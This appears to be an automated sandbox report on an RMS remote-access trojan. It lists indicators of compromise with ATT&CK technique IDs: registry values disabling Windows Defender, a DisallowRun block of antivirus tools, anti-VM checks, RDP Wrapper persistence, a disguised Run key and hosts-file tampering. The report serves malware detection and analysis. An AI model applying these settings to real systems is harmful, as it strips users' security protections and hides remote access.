rms | 0f03e2c3dd7ee9b656858db0aa799d3488dcce581d3f0ca03ee76b198f900432

Disable or Modify Tools

T1562.001

Processes:

KMS.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	KMS.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	KMS.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	KMS.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	KMS.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	KMS.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	KMS.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\RealtimeScanDirection = "2"	KMS.exe

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

evasion trojan

Windows Service

Modify Registry

T1112

Disable or Modify Tools

T1562.001

Processes:

KMS.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	KMS.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications	KMS.exe

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs

evasion

Query Registry

Virtualization/Sandbox Evasion

T1497

Processes:

Setup.exeKMS.exeupdate.exesmss.exeIP.exeunsecapp.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	KMS.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	update.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	smss.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	IP.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	unsecapp.exe

Blocks application from running via registry modification 28 IoCs

Adds application to list of disallowed applications.

evasion

Processes:

KMS.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\12 = "AVbr.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\16 = "FRST64.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\21 = "PANDAFREEAV.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\15 = "cureit.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\18 = "esetonlinescanner.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe"	KMS.exe
Key created	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\17 = "eset_internet_security_live_installer.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\13 = "AV_br.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\19 = "eset_nod32_antivirus_live_installer.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\22 = "bitdefender_avfree.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\23 = "drweb-12.0-ss-win.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\24 = "cureit.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\25 = "TDSSKiller.exe"	KMS.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\14 = "KVRT.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\20 = "MBSetup.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\26 = "eset_smart_security_premium_live_installer.exe"	KMS.exe

Drops file in Drivers directory 1 IoCs

Processes:

cmd.exe

description ioc process

File opened for modification C:\Windows\System32\drivers\etc\hosts cmd.exe
Modifies Windows Firewall 2 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

2640 netsh.exe
Sets DLL path for service in the registry 2 TTPs 1 IoCs
persistence

Registry Run Keys / Startup Folder
T1547.001

Modify Registry
T1112

Processes:

RDPWinst.exe

description ioc process

Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWinst.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe

pid	process
2640	netsh.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWinst.exe

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

update.exesmss.exeIP.exeSetup.exeKMS.exeunsecapp.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	update.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	smss.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	smss.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	IP.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	KMS.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	KMS.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	update.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	IP.exe

Executes dropped EXE 13 IoCs

Processes:

install.exeKMS.exeupdate.exewin.exesvchost.exeIP.exesmss.exewinserv.exewinserv.exewinserv.exewinserv.exeunsecapp.exeRDPWinst.exe

pid process

4504 install.exe
1272 KMS.exe
3708 update.exe
3328 win.exe
3912 svchost.exe
2304 IP.exe
2732 smss.exe
3812 winserv.exe
2860 winserv.exe
1636 winserv.exe
1320 winserv.exe
1944 unsecapp.exe
1372 RDPWinst.exe
Loads dropped DLL 1 IoCs

Processes:

svchost.exe

pid process

3932 svchost.exe

pid	process
4504	install.exe
1272	KMS.exe
3708	update.exe
3328	win.exe
3912	svchost.exe
2304	IP.exe
2732	smss.exe
3812	winserv.exe
2860	winserv.exe
1636	winserv.exe
1320	winserv.exe
1944	unsecapp.exe
1372	RDPWinst.exe

pid	process
3932	svchost.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
1616	icacls.exe
1548	icacls.exe
2212	icacls.exe
2724	icacls.exe
4060	icacls.exe
4416	icacls.exe
3332	icacls.exe
4080	icacls.exe
4492	icacls.exe
4752	icacls.exe
456	icacls.exe
3440	icacls.exe
1384	icacls.exe
5032	icacls.exe
2476	icacls.exe
4076	icacls.exe
788	icacls.exe
956	icacls.exe
1380	icacls.exe
5052	icacls.exe
5028	icacls.exe
1872	icacls.exe
1544	icacls.exe
3980	icacls.exe
4528	icacls.exe
1544	icacls.exe
4504	icacls.exe
3404	icacls.exe
1872	icacls.exe
4784	icacls.exe
4748	icacls.exe
3924	icacls.exe
2472	icacls.exe
3824	icacls.exe
864	icacls.exe
2580	icacls.exe
3604	icacls.exe
1472	icacls.exe
2492	icacls.exe
1960	icacls.exe
1800	icacls.exe
2724	icacls.exe
3928	icacls.exe
3364	icacls.exe
2252	icacls.exe
4412	icacls.exe
3328	icacls.exe
3604	icacls.exe
4512	icacls.exe
3784	icacls.exe
4800	icacls.exe
4648	icacls.exe
1492	icacls.exe
3116	icacls.exe
4768	icacls.exe
392	icacls.exe
4256	icacls.exe
2700	icacls.exe
1092	icacls.exe
1724	icacls.exe
864	icacls.exe
1072	icacls.exe
4000	icacls.exe
3024	icacls.exe

Themida packer 64 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral3/memory/1804-0-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp	themida
behavioral3/memory/1804-2-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp	themida
behavioral3/memory/1804-3-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp	themida
behavioral3/memory/1804-4-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp	themida
behavioral3/memory/1804-5-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp	themida
behavioral3/memory/1804-7-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp	themida
behavioral3/memory/1804-8-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp	themida
behavioral3/memory/1804-9-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp	themida
behavioral3/memory/1804-6-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp	themida
C:\ProgramData\Setup\KMS.exe	themida
behavioral3/memory/1272-37-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp	themida
behavioral3/memory/1272-39-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp	themida
behavioral3/memory/1272-41-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp	themida
behavioral3/memory/1272-40-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp	themida
behavioral3/memory/1272-42-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp	themida
behavioral3/memory/1272-38-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp	themida
behavioral3/memory/1272-44-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp	themida
behavioral3/memory/1272-43-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp	themida
behavioral3/memory/1804-48-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp	themida
behavioral3/memory/1272-49-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp	themida
behavioral3/memory/1804-50-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp	themida
behavioral3/memory/3708-51-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp	themida
behavioral3/memory/3708-54-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp	themida
behavioral3/memory/3708-53-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp	themida
behavioral3/memory/3708-52-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp	themida
behavioral3/memory/3708-55-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp	themida
behavioral3/memory/3708-56-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp	themida
behavioral3/memory/3708-58-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp	themida
behavioral3/memory/1804-59-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp	themida
behavioral3/memory/3708-60-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp	themida
behavioral3/memory/1804-61-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp	themida
behavioral3/memory/3708-62-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp	themida
behavioral3/memory/3708-86-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp	themida
behavioral3/memory/1804-85-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp	themida
behavioral3/memory/3708-87-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp	themida
behavioral3/memory/1804-97-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp	themida
C:\ProgramData\Setup\IP.exe	themida
C:\ProgramData\Setup\smss.exe	themida
behavioral3/memory/2732-123-0x00007FF68A010000-0x00007FF68B043000-memory.dmp	themida
behavioral3/memory/2732-124-0x00007FF68A010000-0x00007FF68B043000-memory.dmp	themida
behavioral3/memory/2732-125-0x00007FF68A010000-0x00007FF68B043000-memory.dmp	themida
behavioral3/memory/2732-128-0x00007FF68A010000-0x00007FF68B043000-memory.dmp	themida
behavioral3/memory/2732-127-0x00007FF68A010000-0x00007FF68B043000-memory.dmp	themida
behavioral3/memory/2732-126-0x00007FF68A010000-0x00007FF68B043000-memory.dmp	themida
behavioral3/memory/2732-122-0x00007FF68A010000-0x00007FF68B043000-memory.dmp	themida
behavioral3/memory/2304-137-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp	themida
behavioral3/memory/2304-138-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp	themida
behavioral3/memory/2304-141-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp	themida
behavioral3/memory/2304-144-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp	themida
behavioral3/memory/2304-145-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp	themida
behavioral3/memory/2304-146-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp	themida
behavioral3/memory/2304-139-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp	themida
C:\Windows\SysWOW64\unsecapp.exe	themida
behavioral3/memory/1804-175-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp	themida
behavioral3/memory/3708-176-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp	themida
behavioral3/memory/2304-177-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp	themida
behavioral3/memory/2732-178-0x00007FF68A010000-0x00007FF68B043000-memory.dmp	themida
behavioral3/memory/2304-325-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp	themida
behavioral3/memory/1944-386-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmp	themida
behavioral3/memory/1944-387-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmp	themida
behavioral3/memory/1944-385-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmp	themida
behavioral3/memory/1944-383-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmp	themida
behavioral3/memory/1944-384-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmp	themida
behavioral3/memory/1944-382-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmp	themida

Adds Run key to start application 2 TTPs 1 IoCs
persistence

Registry Run Keys / Startup Folder
T1547.001

Modify Registry
T1112

Processes:

IP.exe

description ioc process

Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" IP.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	IP.exe

Checks whether UAC is enabled 1 TTPs 6 IoCs

evasion trojan

System Information Discovery

Processes:

Setup.exeKMS.exeupdate.exeIP.exesmss.exeunsecapp.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Setup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	KMS.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	update.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	IP.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	smss.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	unsecapp.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

1 ip-api.com
Modifies WinLogon 2 TTPs 1 IoCs
persistence

Winlogon Helper DLL
T1547.004

Modify Registry
T1112

Processes:

RDPWinst.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWinst.exe

flow	ioc
1	ip-api.com

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWinst.exe

AutoIT Executable 52 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
behavioral3/memory/1804-3-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp	autoit_exe
behavioral3/memory/1804-4-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp	autoit_exe
behavioral3/memory/1804-5-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp	autoit_exe
behavioral3/memory/1804-7-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp	autoit_exe
behavioral3/memory/1804-8-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp	autoit_exe
behavioral3/memory/1804-9-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp	autoit_exe
behavioral3/memory/1804-6-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp	autoit_exe
behavioral3/memory/1272-39-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp	autoit_exe
behavioral3/memory/1272-41-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp	autoit_exe
behavioral3/memory/1272-40-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp	autoit_exe
behavioral3/memory/1272-42-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp	autoit_exe
behavioral3/memory/1272-44-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp	autoit_exe
behavioral3/memory/1272-43-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp	autoit_exe
behavioral3/memory/1804-48-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp	autoit_exe
behavioral3/memory/1272-49-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp	autoit_exe
behavioral3/memory/1804-50-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp	autoit_exe
behavioral3/memory/3708-54-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp	autoit_exe
behavioral3/memory/3708-53-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp	autoit_exe
behavioral3/memory/3708-55-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp	autoit_exe
behavioral3/memory/3708-56-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp	autoit_exe
behavioral3/memory/3708-58-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp	autoit_exe
behavioral3/memory/1804-59-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp	autoit_exe
behavioral3/memory/3708-60-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp	autoit_exe
behavioral3/memory/1804-61-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp	autoit_exe
behavioral3/memory/3708-62-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp	autoit_exe
behavioral3/memory/3708-86-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp	autoit_exe
behavioral3/memory/1804-85-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp	autoit_exe
behavioral3/memory/3708-87-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp	autoit_exe
behavioral3/memory/1804-97-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp	autoit_exe
behavioral3/memory/2732-123-0x00007FF68A010000-0x00007FF68B043000-memory.dmp	autoit_exe
behavioral3/memory/2732-124-0x00007FF68A010000-0x00007FF68B043000-memory.dmp	autoit_exe
behavioral3/memory/2732-125-0x00007FF68A010000-0x00007FF68B043000-memory.dmp	autoit_exe
behavioral3/memory/2732-128-0x00007FF68A010000-0x00007FF68B043000-memory.dmp	autoit_exe
behavioral3/memory/2732-127-0x00007FF68A010000-0x00007FF68B043000-memory.dmp	autoit_exe
behavioral3/memory/2732-126-0x00007FF68A010000-0x00007FF68B043000-memory.dmp	autoit_exe
behavioral3/memory/2304-138-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp	autoit_exe
behavioral3/memory/2304-141-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp	autoit_exe
behavioral3/memory/2304-144-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp	autoit_exe
behavioral3/memory/2304-145-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp	autoit_exe
behavioral3/memory/2304-146-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp	autoit_exe
behavioral3/memory/2304-139-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp	autoit_exe
behavioral3/memory/1804-175-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp	autoit_exe
behavioral3/memory/3708-176-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp	autoit_exe
behavioral3/memory/2304-177-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp	autoit_exe
behavioral3/memory/2732-178-0x00007FF68A010000-0x00007FF68B043000-memory.dmp	autoit_exe
behavioral3/memory/2304-325-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp	autoit_exe
behavioral3/memory/1944-386-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmp	autoit_exe
behavioral3/memory/1944-387-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmp	autoit_exe
behavioral3/memory/1944-385-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmp	autoit_exe
behavioral3/memory/1944-383-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmp	autoit_exe
behavioral3/memory/1944-384-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmp	autoit_exe
behavioral3/memory/1944-382-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmp	autoit_exe

Drops file in System32 directory 3 IoCs

Processes:

IP.exeRDPWinst.exe

description ioc process

File created C:\Windows\SysWOW64\unsecapp.exe IP.exe
File opened for modification C:\Windows\SysWOW64\unsecapp.exe IP.exe
File created C:\Windows\System32\rfxvmt.dll RDPWinst.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

Processes:

Setup.exeKMS.exeupdate.exeIP.exesmss.exeunsecapp.exe

pid process

1804 Setup.exe
1272 KMS.exe
3708 update.exe
2304 IP.exe
2732 smss.exe
1944 unsecapp.exe

description	ioc	process
File created	C:\Windows\SysWOW64\unsecapp.exe	IP.exe
File opened for modification	C:\Windows\SysWOW64\unsecapp.exe	IP.exe
File created	C:\Windows\System32\rfxvmt.dll	RDPWinst.exe

Drops file in Program Files directory 46 IoCs

Processes:

update.exesmss.exeRDPWinst.exe

description	ioc	process
File opened for modification	C:\Program Files\AVG	update.exe
File opened for modification	C:\Program Files\Kaspersky Lab	update.exe
File opened for modification	C:\Program Files (x86)\IObit\IObit Malware Fighter	update.exe
File opened for modification	C:\Program Files (x86)\SpeedFan	update.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	smss.exe
File opened for modification	C:\Program Files\Enigma Software Group	update.exe
File opened for modification	C:\Program Files\AVAST Software	update.exe
File opened for modification	C:\Program Files (x86)\Cezurity	update.exe
File opened for modification	C:\Program Files (x86)\IObit\Advanced SystemCare	update.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWinst.exe
File opened for modification	C:\Program Files\ByteFence	update.exe
File opened for modification	C:\Program Files\Bitdefender Agent	update.exe
File opened for modification	C:\Program Files\RogueKiller	update.exe
File opened for modification	C:\Program Files (x86)\360	update.exe
File opened for modification	C:\Program Files\Malwarebytes	update.exe
File opened for modification	C:\Program Files\DrWeb	update.exe
File opened for modification	C:\Program Files\COMODO	update.exe
File opened for modification	C:\Program Files (x86)\AVG	update.exe
File opened for modification	C:\Program Files\Common Files\Doctor Web	update.exe
File opened for modification	C:\Program Files (x86)\Kaspersky Lab	update.exe
